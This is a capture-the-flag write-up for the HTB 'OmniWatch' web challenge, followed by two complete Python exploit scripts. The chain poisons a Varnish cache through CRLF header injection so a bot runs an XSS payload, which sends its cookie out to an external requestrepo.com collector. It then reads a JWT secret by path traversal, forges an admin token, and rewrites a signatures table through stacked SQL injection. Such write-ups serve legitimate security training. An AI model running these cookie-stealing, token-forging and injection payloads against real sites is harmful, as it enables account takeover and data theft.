Summary
Description
- Proxy/cacher: Varnish in front of Flask (port 3000) and a Zig “oracle” (port 4000).
- Broken cache key:
vcl_hashonly hashesreq.http.CacheKeyand omits the URL, so all oracle requests can collide. - CRLF header injection: Zig endpoint
/oracle/:mode/:deviceIdreflectsdeviceIdinto the DeviceId response header without sanitization. Injecting\r\nHeader: Valueadds arbitrary headers to the backend response. - Poisoning trick: Visit
/oracle/<html-xss>/<deviceId-with-CRLF>to:- set
CacheKey: enable(backend response header) → Varnish caches for ~10s; - add
Content-Type: text/htmlso browsers parse body as HTML (not JSON); - body contains our
<script>(since we used an HTMLmode), but the cached object is served for any/oracle/json/*due to the broken hash, so the bot’s/oracle/json/{1..15}fetch executes our XSS.
- set
- Post-XSS: Bot leaks
jwtcookie (moderator). - Privilege escalation:
- LFI/path traversal:
/controller/firmwarePOSTpatch=/app/jwt_secret.txtreturns the HS256 secret. - JWT forge: Craft
account_type=administratorJWT. - Signature guard bypass (SQLi):
/controller/device/<id>builds SQL with f-string andmulti=True. Use';UPDATE signatures SET signature='<your_sig>' WHERE user_id=1;SELECT 1;--to align DB-stored signature with your forged token. - Flag:
/controller/adminrendersos.popen("/readflag").read(), printingHTB{...}.
- LFI/path traversal:
Analyst
Root causes
- Varnish
vcl_hashuses onlyreq.http.CacheKey→ cache keyless collisions. - Oracle writes
DeviceIdheader with unsanitized path data → classic CRLF response-splitting. - Flask firmware preview reads arbitrary absolute path (
/app/jwt_secret.txt) → LFI. - Device fetch uses f-string +
multi=True→ SQL injection (stacked queries). - JWT “signature pinning” stored in DB is bypassable by SQLi.
Impact chain
CRLF resp-split → cache-poison HTML → bot XSS → JWT theft → read secret → forge admin → SQLi signature → admin route → SUID /readflag → flag.
Exploit
1) Poison cache with XSS (example)
GET /oracle/%3Cscript%3Efetch(`https://<your-collector>/?cookie=${document.cookie}`)%3C/script%3E/7%0D%0ACacheKey:%20enable%0D%0AContent-Type:%20text%2Fhtml HTTP/1.1
Host: localhost:1337
Connection: close
- Wait ≤10s for the bot to hit
/oracle/json/<rand>and exfil the cookie.
2) Use stolen moderator JWT
- Verify it works on
/controller/home.
3) Read HS256 secret
- POST
/controller/firmwarewithpatch=/app/jwt_secret.txt→ get secret.
4) Forge admin JWT
- HS256 header+payload with
{"user_id":1,"username":"adminified","account_type":"administrator"}.
5) SQLi to align signature
- GET
/controller/device/1';UPDATE signatures SET signature='<jwt_sig>' WHERE user_id=1;SELECT 1;-- - Now the server accepts your forged admin cookie.
6) Grab flag
- GET
/controller/admin→ page includes output of/readflag→HTB{...}.
You already have two helper scripts:
- Poison/watch bot: polls
/controller/bot_running, poisons with CRLF, logs cache headers. - Escalate & dump flag: uses stolen JWT → read secret → forge admin → SQLi signature → fetch flag (with optional rollback).
Result
- Successfully retrieved the flag:
HTB{f4k3_fl4g_f0r_t35t1ng}(placeholder; on the real instance this will be randomized). - Demonstrated a full end-to-end chain combining CRLF response-splitting cache poisoning, headless-bot XSS, LFI, JWT forgery, and stacked SQLi to reach a SUID-backed flag reader.
#!/usr/bin/env python3
import argparse
import time
import requests
from urllib.parse import quote
# -------------------- config --------------------
DEFAULT_EXFIL = "https://lvaf27y0.requestrepo.com/?cookie=${document.cookie}"
TTL_SECONDS = 10 # Varnish TTL when CacheKey: enable
# -------------------- helpers --------------------
def log(msg):
print(f"[{time.strftime('%H:%M:%S')}] {msg}", flush=True)
def get(url, **kw):
try:
return requests.get(url, timeout=8, allow_redirects=False, **kw)
except Exception as e:
log(f"GET {url} -> ERROR: {e}")
return None
def poll_bot_running(base):
r = get(f"{base}/controller/bot_running")
if not r:
return None
try:
# endpoint returns plain text: "running" or "not_running"
return r.text.strip()
except Exception:
return None
def build_poison_url(base, exfil, device_id_base="7"):
"""
We serve HTML (not JSON) with inline <script> XSS via the `mode` path segment
AND inject response headers via CRLF in the `deviceId` path segment:
CacheKey: enable -> enables caching for ~10s
Content-Type: text/html -> makes browser treat it as HTML
"""
mode = f"<script>fetch(`{exfil}`)</script>"
mode_enc = quote(mode, safe="") # %3Cscript%3E...%3C%2Fscript%3E
# CRLF-inject response headers into the DeviceId header that Zig sets:
injected_device = (
f"{device_id_base}"
f"%0D%0ACacheKey:%20enable"
f"%0D%0AContent-Type:%20text%2Fhtml"
)
return f"{base}/oracle/{mode_enc}/{injected_device}"
def verify_hit(base):
"""
Fetch a random json endpoint. If poisoned, we should get:
- X-Cache: HIT
- Content-Type: text/html
- body containing our <script>
"""
# Any /oracle/json/<id> should collide on the empty CacheKey hash
test_url = f"{base}/oracle/json/1"
r = get(test_url)
if not r:
return False
xcache = r.headers.get("X-Cache")
ctype = r.headers.get("Content-Type")
body = r.text[:200].replace("\n", " ")
log(f"VERIFY GET {test_url} -> {r.status_code} X-Cache={xcache} Content-Type={ctype}")
log(f"Body[0:200]: {body}")
return (ctype and "text/html" in ctype and xcache == "HIT" and "<script>" in r.text)
# -------------------- main flow --------------------
def main():
ap = argparse.ArgumentParser(description="HTB OmniWatch bot watcher + cache poisoner")
ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
ap.add_argument("--port", default=1337, type=int, help="port (default 1337)")
ap.add_argument("--exfil", default=DEFAULT_EXFIL, help="exfil URL used inside the <script> fetch(...)")
ap.add_argument("--wait-after-running", type=float, default=2.0,
help="seconds to wait after bot enters 'running' before poisoning (default 2.0)")
ap.add_argument("--loop", action="store_true", help="keep looping to catch future bot runs")
args = ap.parse_args()
base = f"{args.host}:{args.port}"
log(f"Target base: {base}")
log("Polling /controller/bot_running...")
while True:
status = poll_bot_running(base)
if status is None:
time.sleep(0.5)
continue
log(f"bot_running = {status}")
if status == "running":
# give the bot a beat to finish login (the bot sleeps ~3s after loading /login)
time.sleep(max(0.0, args.wait_after_running))
# -------- Poison --------
poison_url = build_poison_url(base, args.exfil)
log(f"POISON -> {poison_url}")
r = get(poison_url)
if r:
# print debug headers
xcache = r.headers.get("X-Cache")
hits = r.headers.get("X-Cache-Hits")
devid = r.headers.get("DeviceId")
ctype = r.headers.get("Content-Type")
log(f"Poison resp: {r.status_code} X-Cache={xcache} Hits={hits} DeviceId={devid} Content-Type={ctype}")
log(f"Poison body[0:160]: {r.text[:160].replace(chr(10),' ')}")
if __name__ == "__main__":
main()
#!/usr/bin/env python3
import argparse, base64, hashlib, hmac, json, re, sys, time
from urllib.parse import quote
import requests
# ---------- utils ----------
def b64url(b: bytes) -> str:
return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
def mk_jwt(payload: dict, secret: str) -> str:
header = {"alg": "HS256", "typ": "JWT"}
p_json = json.dumps(payload, separators=(",", ":")).encode()
h_json = json.dumps(header, separators=(",", ":")).encode()
head = b64url(h_json)
body = b64url(p_json)
sig = b64url(hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest())
return f"{head}.{body}.{sig}"
def jwt_sig(jwt: str) -> str:
return jwt.split(".")[-1]
def log(*a): print("[*]", *a, flush=True)
def get(sess, url, **kw):
return sess.get(url, timeout=8, allow_redirects=False, **kw)
def post(sess, url, **kw):
return sess.post(url, timeout=8, allow_redirects=False, **kw)
# ---------- exploit steps ----------
def verify_moderator(sess, base):
r = get(sess, f"{base}/controller/home")
if r.status_code != 200:
raise RuntimeError(f"moderator cookie not accepted: {r.status_code}")
log("Moderator access OK")
def read_jwt_secret(sess, base) -> str:
# Path traversal via firmware preview
data = {"patch": "/app/jwt_secret.txt"}
r = post(sess, f"{base}/controller/firmware", data=data)
if r.status_code != 200 or not r.text.strip():
raise RuntimeError(f"failed reading jwt secret: {r.status_code}")
secret = r.text.strip()
log("Read jwt_secret.txt:", secret[:16] + ("..." if len(secret) > 16 else ""))
return secret
def sqli_update_signature(sess, base, new_sig: str, user_id: int = 1):
# /controller/device/<id> is vulnerable: f-string + multi=True
inj = f"1';UPDATE signatures SET signature='{new_sig}' WHERE user_id={user_id};SELECT 1;-- a"
url = f"{base}/controller/device/{quote(inj, safe='')}"
r = get(sess, url)
if r.status_code not in (200, 302):
raise RuntimeError(f"SQLi update failed: HTTP {r.status_code}")
log("Signatures table updated for user_id", user_id)
def get_flag(sess, base) -> str:
r = get(sess, f"{base}/controller/admin")
if r.status_code != 200:
raise RuntimeError(f"admin fetch failed: {r.status_code}")
m = re.search(r"HTB\{[^\}]+\}", r.text)
if not m:
open("/tmp/admin.html","w").write(r.text)
raise RuntimeError("Flag not found in admin page (saved /tmp/admin.html)")
return m.group(0)
def main():
ap = argparse.ArgumentParser(description="HTB OmniWatch: escalate moderator -> admin -> flag via JWT+SQLi")
ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
ap.add_argument("--port", type=int, default=1337, help="port (default 1337)")
ap.add_argument("--stolen-jwt", required=True, help="the moderator JWT you exfiltrated")
ap.add_argument("--user-id", type=int, default=1, help="user_id of the moderator (default 1)")
ap.add_argument("--rollback", action="store_true", help="restore original signature after grabbing flag")
args = ap.parse_args()
base = f"{args.host}:{args.port}"
print(base)
sess = requests.Session()
# Use stolen moderator cookie
sess.cookies.set("jwt", args.stolen_jwt, path="/")
log("Target:", base)
verify_moderator(sess, base)
# 1) Read server-side JWT secret
secret = read_jwt_secret(sess, base)
# 2) Forge an admin JWT for same user_id
admin_payload = {
"user_id": args.user_id,
"username": "adminified",
"account_type": "administrator"
}
admin_jwt = mk_jwt(admin_payload, secret)
new_sig = jwt_sig(admin_jwt)
old_sig = jwt_sig(args.stolen_jwt)
log("Old sig:", old_sig[:10], "... New sig:", new_sig[:10], "...")
# 3) SQLi to update signatures.signature to our new token's signature
sqli_update_signature(sess, base, new_sig, user_id=args.user_id)
# 4) Swap cookie to our forged admin token and read flag
sess.cookies.set("jwt", admin_jwt, path="/")
flag = get_flag(sess, base)
log("FLAG:", flag)
# 5) Optional rollback so bot keeps working with its original cookie
if args.rollback:
log("Rolling back signature to original…")
try:
sqli_update_signature(sess, base, old_sig, user_id=args.user_id)
log("Rollback OK")
except Exception as e:
log("Rollback failed:", e)
if __name__ == "__main__":
try:
main()
except Exception as e:
log("ERROR:", e)
sys.exit(1)